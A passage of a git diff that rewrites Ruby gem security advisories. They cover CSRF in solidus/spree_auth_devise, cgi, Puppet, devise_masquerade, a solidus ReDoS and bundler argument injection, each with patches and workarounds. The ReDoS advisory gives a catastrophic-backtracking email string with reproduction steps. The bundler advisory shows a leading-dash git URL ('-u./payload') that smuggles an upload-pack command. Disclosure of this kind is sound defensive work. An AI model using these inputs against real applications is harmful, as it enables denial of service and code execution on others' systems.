+      (`:null_session` is the default in case the no strategy is given, but
+      `rails --new` generated skeleton use `:exception`).
+
+    That means that applications that haven't been configured differently from
+    what it's generated with Rails aren't affected.
+
+    ### Patches
+    Users should promptly update to `solidus_auth_devise` version `2.5.4`.
+
+    ### Workarounds
+    A couple of options:
+
+    - If possible, change your strategy to `:exception`:
+      ```ruby
+      class ApplicationController < ActionController::Base
+
+         protect_from_forgery with: :exception
+      end
+      ```
+
+    - Add the following to `config/application.rb` to at least run the `:exception`
+      strategy on the affected controller:
+      ```ruby
+      config.after_initialize do
+        Spree::UsersController.protect_from_forgery
+      with: :exception
+      end
+      ```
+
+    - We've also released new Solidus versions monkey patching `solidus_auth_devise`
+      with the quick fix. Those versions are `v3.1.3`, `v.3.0.3` & `v2.11.12`. See
+      [GHSA-5629-8855-gf4g](https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g)
+      for details.
+
+    ### References
+    - [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf)
+    - [Solidus security](https://solidus.io/security/)
+  cvss_v3: 9.3
+  unaffected_versions:
+  - "< 1.0.0"
+  patched_versions:
+  - ">= 2.5.4"
+---
diff --git a/advisories/_posts/2021-11-18-CVE-2021-41275.md b/advisories/_posts/2021-11-18-CVE-2021-41275.md
index 890354ac..dc90b8f3 100644
--- a/advisories/_posts/2021-11-18-CVE-2021-41275.md
+++ b/advisories/_posts/2021-11-18-CVE-2021-41275.md
@@ -1,73 +1,73 @@
----
-layout: advisory
-title: 'CVE-2021-41275 (spree_auth_devise): Authentication Bypass by CSRF Weakness'
-comments: false
-categories:
-- spree_auth_devise
-advisory:
-  gem: spree_auth_devise
-  cve: 2021-41275
-  ghsa: 26xx-m4q2-xhq8
-  url: https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
-  title: Authentication Bypass by CSRF Weakness
-  date: 2021-11-18
-  description: |
-    ### Impact
-
-    CSRF vulnerability that allows user account takeover.
-
-    All applications using any version of the frontend component of `spree_auth_devise`
-    are affected if `protect_from_forgery` method is both:
-    * Executed whether as:
-      * A `before_action` callback (the default)
-      * A `prepend_before_action` (option `prepend: true` given) before the
-        `:load_object` hook in `Spree::UserController` (most likely order to find).
-    * Configured to use ``:null_session` or ``:reset_session` strategies
-      (``:null_session` is the default in case the no strategy is given, but `rails --new`
-      generated skeleton use ``:exception`).
-
-    That means that applications that haven't been configured differently from
-    what is generated with Rails aren't affected.
-
-    ### Patches
-
-    * Spree 4.3 users should update to `spree_auth_devise` 4.4.1
-    * Spree 4.2 users should update to `spree_auth_devise` 4.2.1
-    * Spree 4.1 users should update to `spree_auth_devise` 4.1.1
-    * Older Spree version users should update to `spree_auth_devise` 4.0.1
-
-    ### Workarounds
-
-    If possible, change your strategy to `:exception`:
-
-    ```ruby
-    class ApplicationController
-      < ActionController::Base
-      protect_from_forgery with: :exception
-    end
-    ```
-
-    Add the following to `config/application.rb` to at least run the `:exception`
-    strategy on the affected controller:
-
-    ```ruby
-    config.after_initialize do
-      Spree::UsersController.protect_from_forgery
-      with: :exception
-    end
-    ```
-  cvss_v3: 9.3
-  patched_versions:
-  - "~> 4.0.1"
-  - "~> 4.1.1"
-  - "~> 4.2.1"
-  - ">= 4.4.1"
-  related:
-    ghsa:
-    - xm34-v85h-9pg2
-    - gpqc-4pp7-5954
-    - 8xfw-5q82-3652
-    - 6mqr-q86q-6gwr
-    url:
-    - https://github.com/spree/spree_auth_devise/commit/adf6ed4cd94d66091776b5febd4ff3767362de63
----
+---
+layout: advisory
+title: 'CVE-2021-41275 (spree_auth_devise): Authentication Bypass by CSRF Weakness'
+comments: false
+categories:
+- spree_auth_devise
+advisory:
+  gem: spree_auth_devise
+  cve: 2021-41275
+  ghsa: 26xx-m4q2-xhq8
+  url: https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+  title: Authentication Bypass by CSRF Weakness
+  date: 2021-11-18
+  description: |
+    ### Impact
+
+    CSRF vulnerability that allows user account takeover.
+
+    All applications using any version of the frontend component of `spree_auth_devise`
+    are affected if `protect_from_forgery` method is both:
+    * Executed whether as:
+      * A `before_action` callback (the default)
+      * A `prepend_before_action` (option `prepend: true` given) before the
+        `:load_object` hook in `Spree::UserController` (most likely order to find).
+    * Configured to use ``:null_session` or ``:reset_session` strategies
+      (``:null_session` is the default in case the no strategy is given, but `rails --new`
+      generated skeleton use ``:exception`).
+
+    That means that applications that haven't been configured differently from
+    what is generated with Rails aren't affected.
+
+    ### Patches
+
+    * Spree 4.3 users should update to `spree_auth_devise` 4.4.1
+    * Spree 4.2 users should update to `spree_auth_devise` 4.2.1
+    * Spree 4.1 users should update to `spree_auth_devise` 4.1.1
+    * Older Spree version users should update to `spree_auth_devise` 4.0.1
+
+    ### Workarounds
+
+    If possible, change your strategy to `:exception`:
+
+    ```ruby
+    class ApplicationController
+      < ActionController::Base
+      protect_from_forgery with: :exception
+    end
+    ```
+
+    Add the following to `config/application.rb` to at least run the `:exception`
+    strategy on the affected controller:
+
+    ```ruby
+    config.after_initialize do
+      Spree::UsersController.protect_from_forgery
+      with: :exception
+    end
+    ```
+  cvss_v3: 9.3
+  patched_versions:
+  - "~> 4.0.1"
+  - "~> 4.1.1"
+  - "~> 4.2.1"
+  - ">= 4.4.1"
+  related:
+    ghsa:
+    - xm34-v85h-9pg2
+    - gpqc-4pp7-5954
+    - 8xfw-5q82-3652
+    - 6mqr-q86q-6gwr
+    url:
+    - https://github.com/spree/spree_auth_devise/commit/adf6ed4cd94d66091776b5febd4ff3767362de63
+---
diff --git a/advisories/_posts/2021-11-18-GHSA-5629-8855-gf4g.md b/advisories/_posts/2021-11-18-GHSA-5629-8855-gf4g.md
index c5d7139c..159e7d8a 100644
--- a/advisories/_posts/2021-11-18-GHSA-5629-8855-gf4g.md
+++ b/advisories/_posts/2021-11-18-GHSA-5629-8855-gf4g.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'GHSA-5629-8855-gf4g (solidus_core): Authentication Bypass by CSRF Weakness'
-comments: false
-categories:
-- solidus_core
-advisory:
-  gem: solidus_core
-  ghsa: 5629-8855-gf4g
-  url: https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g
-  title: Authentication Bypass by CSRF Weakness
-  date: 2021-11-18
-  description: |
-    ### Impact
-    The actual vulnerability has been discovered on `solidus_auth_devise`. See
-    [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2)
-    for details.
-
-    The security advisory here exists to provide an extra layer of security in
-    the form of a monkey patch for users who don't update `solidus_auth_devise`.
-    For this reason, it has been marked as low impact on this end.
-
-    ### Patches
-    For extra security, update `solidus_core` to versions `3.1.3`, `3.0.3`, or
-    `2.11.12`.
-
-    ### Workarounds
-    Look at the workarounds described at
-    [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2).
-  cvss_v3: 9.3
-  patched_versions:
-  - ">= 3.1.3"
-  - "~> 3.0.3"
-  - "~> 2.11.12"
-  related:
-    ghsa:
-    - xm34-v85h-9pg2
----
+---
+layout: advisory
+title: 'GHSA-5629-8855-gf4g (solidus_core): Authentication Bypass by CSRF Weakness'
+comments: false
+categories:
+- solidus_core
+advisory:
+  gem: solidus_core
+  ghsa: 5629-8855-gf4g
+  url: https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g
+  title: Authentication Bypass by CSRF Weakness
+  date: 2021-11-18
+  description: |
+    ### Impact
+    The actual vulnerability has been discovered on `solidus_auth_devise`. See
+    [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2)
+    for details.
+
+    The security advisory here exists to provide an extra layer of security in
+    the form of a monkey patch for users who don't update `solidus_auth_devise`.
+    For this reason, it has been marked as low impact on this end.
+
+    ### Patches
+    For extra security, update `solidus_core` to versions `3.1.3`, `3.0.3`, or
+    `2.11.12`.
+
+    ### Workarounds
+    Look at the workarounds described at
+    [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2).
+  cvss_v3: 9.3
+  patched_versions:
+  - ">= 3.1.3"
+  - "~> 3.0.3"
+  - "~> 2.11.12"
+  related:
+    ghsa:
+    - xm34-v85h-9pg2
+---
diff --git a/advisories/_posts/2021-11-24-CVE-2021-41816.md b/advisories/_posts/2021-11-24-CVE-2021-41816.md
index 82901033..7bbb00c6 100644
--- a/advisories/_posts/2021-11-24-CVE-2021-41816.md
+++ b/advisories/_posts/2021-11-24-CVE-2021-41816.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2021-41816 (cgi): Buffer Overrun in CGI.escape_html'
-comments: false
-categories:
-- cgi
-advisory:
-  gem: cgi
-  cve: 2021-41816
-  ghsa: 5cqm-crxm-6qpv
-  url: https://www.ruby-lang.org/en/news/2021/11/24/buffer-overrun-in-cgi-escape_html-cve-2021-41816/
-  title: Buffer Overrun in CGI.escape_html
-  date: 2021-11-24
-  description: |
-    A security vulnerability that causes buffer overflow when you pass a very large
-    string (> 700 MB) to `CGI.escape_html` on a platform where `long` type takes 4 bytes,
-    typically, Windows.
-
-    Please update the cgi gem to version 0.3.1, 0.2.1, and 0.1.1 or later. You can use
-    `gem update cgi` to update it. If you are using bundler, please add `gem "cgi",
-    ">= 0.3.1"` to your `Gemfile`. Alternatively, please update Ruby to 2.7.5 or 3.0.3.
-
-    This issue has been introduced since Ruby 2.7, so the cgi version bundled with Ruby
-    2.6 is not vulnerable.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 0.1.0.1"
-  - "~> 0.1.1"
-  - "~> 0.2.1"
-  - ">= 0.3.1"
----
+---
+layout: advisory
+title: 'CVE-2021-41816 (cgi): Buffer Overrun in CGI.escape_html'
+comments: false
+categories:
+- cgi
+advisory:
+  gem: cgi
+  cve: 2021-41816
+  ghsa: 5cqm-crxm-6qpv
+  url: https://www.ruby-lang.org/en/news/2021/11/24/buffer-overrun-in-cgi-escape_html-cve-2021-41816/
+  title: Buffer Overrun in CGI.escape_html
+  date: 2021-11-24
+  description: |
+    A security vulnerability that causes buffer overflow when you pass a very large
+    string (> 700 MB) to `CGI.escape_html` on a platform where `long` type takes 4 bytes,
+    typically, Windows.
+
+    Please update the cgi gem to version 0.3.1, 0.2.1, and 0.1.1 or later. You can use
+    `gem update cgi` to update it. If you are using bundler, please add `gem "cgi",
+    ">= 0.3.1"` to your `Gemfile`. Alternatively, please update Ruby to 2.7.5 or 3.0.3.
+
+    This issue has been introduced since Ruby 2.7, so the cgi version bundled with Ruby
+    2.6 is not vulnerable.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 0.1.0.1"
+  - "~> 0.1.1"
+  - "~> 0.2.1"
+  - ">= 0.3.1"
+---
diff --git a/advisories/_posts/2021-11-24-CVE-2021-41819.md b/advisories/_posts/2021-11-24-CVE-2021-41819.md
index 0c44b6c8..1296e90a 100644
--- a/advisories/_posts/2021-11-24-CVE-2021-41819.md
+++ b/advisories/_posts/2021-11-24-CVE-2021-41819.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2021-41819 (cgi): Cookie Prefix Spoofing in CGI::Cookie.parse'
-comments: false
-categories:
-- cgi
-advisory:
-  gem: cgi
-  cve: 2021-41819
-  ghsa: 4vf4-qmvg-mh7h
-  url: https://www.ruby-lang.org/en/news/2021/11/24/cookie-prefix-spoofing-in-cgi-cookie-parse-cve-2021-41819/
-  title: Cookie Prefix Spoofing in CGI::Cookie.parse
-  date: 2021-11-24
-  description: |
-    The old versions of `CGI::Cookie.parse` applied URL decoding to cookie names.
-    An attacker could exploit this vulnerability to spoof security prefixes in
-    cookie names, which may be able to trick a vulnerable application.
-
-    By this fix, `CGI::Cookie.parse` no longer decodes cookie names. Note that
-    this is an incompatibility if cookie names that you are using include
-    non-alphanumeric characters that are URL-encoded.
-
-    This is the same issue of CVE-2020-8184.
-
-    If you are using Ruby 2.7 or 3.0:
-
-    * Please update the cgi gem to version 0.3.1, 0.2,1, and 0.1,1 or later. You
-      can use `gem update cgi` to update it. If you are using bundler, please add
-      `gem "cgi", ">= 0.3.1"`` to your `Gemfile`.
-    * Alternatively, please update Ruby to 2.7.5 or 3.0.3.
-
-    If you are using Ruby 2.6:
-
-    * Please update Ruby to 2.6.9. You cannot use `gem update cgi` for Ruby 2.6 or
-      prior.
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 0.1.0.1"
-  - "~> 0.1.1"
-  - "~> 0.2.1"
-  - ">= 0.3.1"
-  related:
-    cve:
-    - 2020-8184
----
+---
+layout: advisory
+title: 'CVE-2021-41819 (cgi): Cookie Prefix Spoofing in CGI::Cookie.parse'
+comments: false
+categories:
+- cgi
+advisory:
+  gem: cgi
+  cve: 2021-41819
+  ghsa: 4vf4-qmvg-mh7h
+  url: https://www.ruby-lang.org/en/news/2021/11/24/cookie-prefix-spoofing-in-cgi-cookie-parse-cve-2021-41819/
+  title: Cookie Prefix Spoofing in CGI::Cookie.parse
+  date: 2021-11-24
+  description: |
+    The old versions of `CGI::Cookie.parse` applied URL decoding to cookie names.
+    An attacker could exploit this vulnerability to spoof security prefixes in
+    cookie names, which may be able to trick a vulnerable application.
+
+    By this fix, `CGI::Cookie.parse` no longer decodes cookie names. Note that
+    this is an incompatibility if cookie names that you are using include
+    non-alphanumeric characters that are URL-encoded.
+
+    This is the same issue of CVE-2020-8184.
+
+    If you are using Ruby 2.7 or 3.0:
+
+    * Please update the cgi gem to version 0.3.1, 0.2,1, and 0.1,1 or later. You
+      can use `gem update cgi` to update it. If you are using bundler, please add
+      `gem "cgi", ">= 0.3.1"`` to your `Gemfile`.
+    * Alternatively, please update Ruby to 2.7.5 or 3.0.3.
+
+    If you are using Ruby 2.6:
+
+    * Please update Ruby to 2.6.9. You cannot use `gem update cgi` for Ruby 2.6 or
+      prior.
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 0.1.0.1"
+  - "~> 0.1.1"
+  - "~> 0.2.1"
+  - ">= 0.3.1"
+  related:
+    cve:
+    - 2020-8184
+---
diff --git a/advisories/_posts/2021-12-02-CVE-2021-27023.md b/advisories/_posts/2021-12-02-CVE-2021-27023.md
index 45401c89..37dba958 100644
--- a/advisories/_posts/2021-12-02-CVE-2021-27023.md
+++ b/advisories/_posts/2021-12-02-CVE-2021-27023.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2021-27023 (puppet): Unsafe HTTP Redirect in Puppet Agent and Puppet Server'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2021-27023
-  ghsa: 93j5-g845-9wqp
-  url: https://puppet.com/security/cve/CVE-2021-27023
-  title: Unsafe HTTP Redirect in Puppet Agent and Puppet Server
-  date: 2021-12-02
-  description: |
-    A flaw was discovered in Puppet Agent and Puppet Server that may result
-    in a leak of HTTP credentials when following HTTP redirects to a different host.
-    This is similar to CVE-2018-1000007
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 6.25.1"
-  - ">= 7.12.1"
-  related:
-    cve:
-    - 2018-1000007
----
+---
+layout: advisory
+title: 'CVE-2021-27023 (puppet): Unsafe HTTP Redirect in Puppet Agent and Puppet Server'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2021-27023
+  ghsa: 93j5-g845-9wqp
+  url: https://puppet.com/security/cve/CVE-2021-27023
+  title: Unsafe HTTP Redirect in Puppet Agent and Puppet Server
+  date: 2021-12-02
+  description: |
+    A flaw was discovered in Puppet Agent and Puppet Server that may result
+    in a leak of HTTP credentials when following HTTP redirects to a different host.
+    This is similar to CVE-2018-1000007
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 6.25.1"
+  - ">= 7.12.1"
+  related:
+    cve:
+    - 2018-1000007
+---
diff --git a/advisories/_posts/2021-12-02-CVE-2021-27025.md b/advisories/_posts/2021-12-02-CVE-2021-27025.md
index 24b5f128..2a3baadf 100644
--- a/advisories/_posts/2021-12-02-CVE-2021-27025.md
+++ b/advisories/_posts/2021-12-02-CVE-2021-27025.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2021-27025 (puppet): Silent Configuration Failure in Puppet Agent'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2021-27025
-  ghsa: q4g7-jrxv-67r9
-  url: https://puppet.com/security/cve/cve-2021-27025
-  title: Silent Configuration Failure in Puppet Agent
-  date: 2021-12-02
-  description: |
-    A flaw was discovered in Puppet Agent where the agent may silently ignore
-    Augeas settings or may be vulnerable to a Denial of Service condition prior to the
-    first 'pluginsync'.
-  cvss_v3: 6.5
-  patched_versions:
-  - "~> 6.25.1"
-  - ">= 7.12.1"
----
+---
+layout: advisory
+title: 'CVE-2021-27025 (puppet): Silent Configuration Failure in Puppet Agent'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2021-27025
+  ghsa: q4g7-jrxv-67r9
+  url: https://puppet.com/security/cve/cve-2021-27025
+  title: Silent Configuration Failure in Puppet Agent
+  date: 2021-12-02
+  description: |
+    A flaw was discovered in Puppet Agent where the agent may silently ignore
+    Augeas settings or may be vulnerable to a Denial of Service condition prior to the
+    first 'pluginsync'.
+  cvss_v3: 6.5
+  patched_versions:
+  - "~> 6.25.1"
+  - ">= 7.12.1"
+---
diff --git a/advisories/_posts/2021-12-07-CVE-2021-43805.md b/advisories/_posts/2021-12-07-CVE-2021-43805.md
index eab8bc0a..ae16e9f8 100644
--- a/advisories/_posts/2021-12-07-CVE-2021-43805.md
+++ b/advisories/_posts/2021-12-07-CVE-2021-43805.md
@@ -1,72 +1,72 @@
----
-layout: advisory
-title: 'CVE-2021-43805 (solidus_core): ReDos vulnerability on guest checkout email
-  validation'
-comments: false
-categories:
-- solidus_core
-advisory:
-  gem: solidus_core
-  cve: 2021-43805
-  ghsa: qxmr-qxh6-2cc9
-  url: https://github.com/solidusio/solidus/security/advisories/GHSA-qxmr-qxh6-2cc9
-  title: ReDos vulnerability on guest checkout email validation
-  date: 2021-12-07
-  description: |
-    ### Impact
-    Denial of service vulnerability that could be exploited during a guest checkout.
-    The regular expression used to validate a guest order's email was subject to
-    exponential backtracking through a fragment like `a.a.`.
-
-    Before the patch, it can be reproduced in the console like this:
-
-    ```ruby
-    irb(main)> Spree::EmailValidator::EMAIL_REGEXP.match "a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.@"
-    processing time: 54.293660s
-    => nil
-    ```
-
-    To reproduce in the browser, fill in the "Customer Email" field with that fake
-    email address during a guest checkout. Before that, you should open the browser
-    dev tools and change the `type` attribute for that field from `email` to `text`.
-    After entering a fake address and pressing the "Save & Continue" button, the
-    browser will take a long term to perform the request before showing an error
-    message for the invalid address. Eventually, making the email string even longer
-    could lead to the exhaustion of server resources.
-
-    ### Patches
-    Versions 3.1.4, 3.0.4, and 2.11.13 have been patched to use a different regular
-    expression.
-
-    There's an improbable chance that some orders in your system end up having
-    associated an email address that is no longer valid. We've added a task to check
-    precisely that:
-
-    ```bash
-    bin/rails solidus:check_orders_with_invalid_email
-    ```
-
-    The above will print information for every affected order if any.
-
-    ### Workarounds
-
-    If a prompt upgrade is not an option, please, add the following to
-    `config/application.rb`:
-
-    ```ruby
-    config.after_initialize do
-      Spree::EmailValidator.send(:remove_const, :EMAIL_REGEXP)
-      Spree::EmailValidator::EMAIL_REGEXP = URI::MailTo::EMAIL_REGEXP
-    end
-    ```
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 2.11.13"
-  - "~> 3.0.4"
-  - ">= 3.1.4"
-  related:
-    url:
-    - https://github.com/solidusio/solidus/commit/6be174c955fad84017ca67589c676526bc5ade71
-    - https://en.wikipedia.org/wiki/ReDoS
-    - https://snyk.io/blog/redos-and-catastrophic-backtracking/
----
+---
+layout: advisory
+title: 'CVE-2021-43805 (solidus_core): ReDos vulnerability on guest checkout email
+  validation'
+comments: false
+categories:
+- solidus_core
+advisory:
+  gem: solidus_core
+  cve: 2021-43805
+  ghsa: qxmr-qxh6-2cc9
+  url: https://github.com/solidusio/solidus/security/advisories/GHSA-qxmr-qxh6-2cc9
+  title: ReDos vulnerability on guest checkout email validation
+  date: 2021-12-07
+  description: |
+    ### Impact
+    Denial of service vulnerability that could be exploited during a guest checkout.
+    The regular expression used to validate a guest order's email was subject to
+    exponential backtracking through a fragment like `a.a.`.
+
+    Before the patch, it can be reproduced in the console like this:
+
+    ```ruby
+    irb(main)> Spree::EmailValidator::EMAIL_REGEXP.match "a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.@"
+    processing time: 54.293660s
+    => nil
+    ```
+
+    To reproduce in the browser, fill in the "Customer Email" field with that fake
+    email address during a guest checkout. Before that, you should open the browser
+    dev tools and change the `type` attribute for that field from `email` to `text`.
+    After entering a fake address and pressing the "Save & Continue" button, the
+    browser will take a long term to perform the request before showing an error
+    message for the invalid address. Eventually, making the email string even longer
+    could lead to the exhaustion of server resources.
+
+    ### Patches
+    Versions 3.1.4, 3.0.4, and 2.11.13 have been patched to use a different regular
+    expression.
+
+    There's an improbable chance that some orders in your system end up having
+    associated an email address that is no longer valid. We've added a task to check
+    precisely that:
+
+    ```bash
+    bin/rails solidus:check_orders_with_invalid_email
+    ```
+
+    The above will print information for every affected order if any.
+
+    ### Workarounds
+
+    If a prompt upgrade is not an option, please, add the following to
+    `config/application.rb`:
+
+    ```ruby
+    config.after_initialize do
+      Spree::EmailValidator.send(:remove_const, :EMAIL_REGEXP)
+      Spree::EmailValidator::EMAIL_REGEXP = URI::MailTo::EMAIL_REGEXP
+    end
+    ```
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 2.11.13"
+  - "~> 3.0.4"
+  - ">= 3.1.4"
+  related:
+    url:
+    - https://github.com/solidusio/solidus/commit/6be174c955fad84017ca67589c676526bc5ade71
+    - https://en.wikipedia.org/wiki/ReDoS
+    - https://snyk.io/blog/redos-and-catastrophic-backtracking/
+---
diff --git a/advisories/_posts/2021-12-08-CVE-2021-28680.md b/advisories/_posts/2021-12-08-CVE-2021-28680.md
index 23ed8b90..33a32f29 100644
--- a/advisories/_posts/2021-12-08-CVE-2021-28680.md
+++ b/advisories/_posts/2021-12-08-CVE-2021-28680.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2021-28680 (devise_masquerade): Improper Privilege Management in devise_masquerade'
-comments: false
-categories:
-- devise_masquerade
-advisory:
-  gem: devise_masquerade
-  cve: 2021-28680
-  ghsa: 25f5-gc4h-hc22
-  url: https://github.com/oivoodoo/devise_masquerade/issues/83
-  title: Improper Privilege Management in devise_masquerade
-  date: 2021-12-08
-  description: |
-    The devise_masquerade gem before 1.3 allows certain attacks when a password's
-    salt is unknown. An application that uses this gem to let administrators masquerade/impersonate
-    users loses one layer of security protection compared to a situation where Devise
-    (without this extension) is used. If the server-side secret_key_base value became
-    publicly known (for instance if it is committed to a public repository by mistake),
-    there are still other protections in place that prevent an attacker from impersonating
-    any user on the site. When masquerading is not used in a plain Devise application,
-    one must know the password salt of the target user if one wants to encrypt and sign
-    a valid session cookie. When devise_masquerade is used, however, an attacker can
-    decide which user the "back" action will go back to without knowing that user's
-    password salt and simply knowing the user ID, by manipulating the session cookie
-    and pretending that a user is already masqueraded by an administrator.
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 1.3.1"
-  related:
-    url:
-    - https://labanskoller.se/blog/2021/03/23/the-devise-extension-that-peeled-off-one-layer-of-the-security-onion-cve-2021-28680/
-    - https://github.com/oivoodoo/devise_masquerade/pull/76
-    - https://github.com/oivoodoo/devise_masquerade/releases/tag/v1.3.1
----
+---
+layout: advisory
+title: 'CVE-2021-28680 (devise_masquerade): Improper Privilege Management in devise_masquerade'
+comments: false
+categories:
+- devise_masquerade
+advisory:
+  gem: devise_masquerade
+  cve: 2021-28680
+  ghsa: 25f5-gc4h-hc22
+  url: https://github.com/oivoodoo/devise_masquerade/issues/83
+  title: Improper Privilege Management in devise_masquerade
+  date: 2021-12-08
+  description: |
+    The devise_masquerade gem before 1.3 allows certain attacks when a password's
+    salt is unknown. An application that uses this gem to let administrators masquerade/impersonate
+    users loses one layer of security protection compared to a situation where Devise
+    (without this extension) is used. If the server-side secret_key_base value became
+    publicly known (for instance if it is committed to a public repository by mistake),
+    there are still other protections in place that prevent an attacker from impersonating
+    any user on the site. When masquerading is not used in a plain Devise application,
+    one must know the password salt of the target user if one wants to encrypt and sign
+    a valid session cookie. When devise_masquerade is used, however, an attacker can
+    decide which user the "back" action will go back to without knowing that user's
+    password salt and simply knowing the user ID, by manipulating the session cookie
+    and pretending that a user is already masqueraded by an administrator.
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 1.3.1"
+  related:
+    url:
+    - https://labanskoller.se/blog/2021/03/23/the-devise-extension-that-peeled-off-one-layer-of-the-security-onion-cve-2021-28680/
+    - https://github.com/oivoodoo/devise_masquerade/pull/76
+    - https://github.com/oivoodoo/devise_masquerade/releases/tag/v1.3.1
+---
diff --git a/advisories/_posts/2021-12-08-CVE-2021-43809.md b/advisories/_posts/2021-12-08-CVE-2021-43809.md
index 1777d22f..db7fa7b6 100644
--- a/advisories/_posts/2021-12-08-CVE-2021-43809.md
+++ b/advisories/_posts/2021-12-08-CVE-2021-43809.md
@@ -1,78 +1,78 @@
----
-layout: advisory
-title: 'CVE-2021-43809 (bundler): Local Code Execution through Argument Injection
-  via dash leading git url parameter in Gemfile'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  cve: 2021-43809
-  ghsa: fj7f-vq84-fh43
-  url: https://github.com/rubygems/rubygems/security/advisories/GHSA-fj7f-vq84-fh43
-  title: Local Code Execution through Argument Injection via dash leading git url
-    parameter in Gemfile
-  date: 2021-12-08
-  description: |
-    In `bundler` versions before 2.2.33, when working with untrusted and apparently harmless
-    `Gemfile`'s, it is not expected that they lead to execution of external code, unless
-    that's explicit in the ruby code inside the `Gemfile` itself. However, if the `Gemfile`
-    includes `gem` entries that use the `git` option with invalid, but seemingly harmless,
-    values with a leading dash, this can be false.
-
-    To handle dependencies that come from a Git repository instead of a registry, Bundler
-    uses various commands, such as `git clone`. These commands are being constructed using
-    user input (e.g. the repository URL). When building the commands, Bundler versions
-    before 2.2.33 correctly avoid Command Injection vulnerabilities by passing an array of
-    arguments instead of a command string. However, there is the possibility that a user
-    input starts with a dash (`-`) and is therefore treated as an optional argument instead
-    of a positional one. This can lead to Code Execution because some of the commands have
-    options that can be leveraged to run arbitrary executables.
-
-    Since this value comes from the `Gemfile` file, it can contain any character, including
-    a leading dash.
-
-    ### Exploitation
-
-    To exploit this vulnerability, an attacker has to craft a directory containing a
-    `Gemfile` file that declares a dependency that is located in a Git repository. This
-    dependency has to have a Git URL in the form of `-u./payload`. This URL will be used to
-    construct a Git clone command but will be interpreted as the
-    [upload-pack](https://git-scm.com/docs/git-clone#Documentation/git-clone.txt--ultupload-packgt)
-    argument. Then this directory needs to be shared with the victim, who then needs to run
-    a command that evaluates the Gemfile, such as `bundle lock`, inside.
-
-    ### Impact
-
-    This vulnerability can lead to Arbitrary Code Execution, which could potentially lead
-    to the takeover of the system. However, as explained above, the exploitability is very
-    low, because it requires a lot of user interaction. It still could put developers at
-    risk when dealing with untrusted files in a way they think is safe, because the exploit
-    still works when the victim tries to make sure nothing can happen, e.g. by manually
-    reviewing the `Gemfile` (although they would need the weird URL with a leading dash to
-    not raise any flags).
-
-    This kind of attack vector
-    [has been used in the past](https://www.cnbc.com/2021/01/26/north-korean-hackers-targeting-security-researchers-on-twitter.html)
-    to target security researchers by sending them projects to collaborate on.
-
-    ### Patches
-
-    Bundler 2.2.33 has patched this problem by inserting `--` as an argument before any
-    positional arguments to those Git commands that were affected by this issue.
-
-    ### Workarounds
-
-    Regardless of whether users can upgrade or not, they should review any untrusted
-    `Gemfile`'s before running any `bundler` commands that may read them, since they
-    can contain arbitrary ruby code.
-  cvss_v3: 6.7
-  patched_versions:
-  - ">= 2.2.33"
-  related:
-    url:
-    - https://github.com/rubygems/rubygems/pull/5142
-    - https://github.com/rubygems/rubygems/commit/0fad1ccfe9dd7a3c5b82c1496df3c2b4842870d3
-    - https://github.com/rubygems/rubygems/commit/a4f2f8ac17e6ce81c689527a8b6f14381060d95f
-    - https://cwe.mitre.org/data/definitions/88.html
----
+---
+layout: advisory
+title: 'CVE-2021-43809 (bundler): Local Code Execution through Argument Injection
+  via dash leading git url parameter in Gemfile'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  cve: 2021-43809
+  ghsa: fj7f-vq84-fh43
+  url: https://github.com/rubygems/rubygems/security/advisories/GHSA-fj7f-vq84-fh43
+  title: Local Code Execution through Argument Injection via dash leading git url
+    parameter in Gemfile
+  date: 2021-12-08
+  description: |
+    In `bundler` versions before 2.2.33, when working with untrusted and apparently harmless
+    `Gemfile`'s, it is not expected that they lead to execution of external code, unless
+    that's explicit in the ruby code inside the `Gemfile` itself. However, if the `Gemfile`
+    includes `gem` entries that use the `git` option with invalid, but seemingly harmless,
+    values with a leading dash, this can be false.
+
+    To handle dependencies that come from a Git repository instead of a registry, Bundler
+    uses various commands, such as `git clone`. These commands are being constructed using
+    user input (e.g. the repository URL). When building the commands, Bundler versions
+    before 2.2.33 correctly avoid Command Injection vulnerabilities by passing an array of
+    arguments instead of a command string. However, there is the possibility that a user
+    input starts with a dash (`-`) and is therefore treated as an optional argument instead
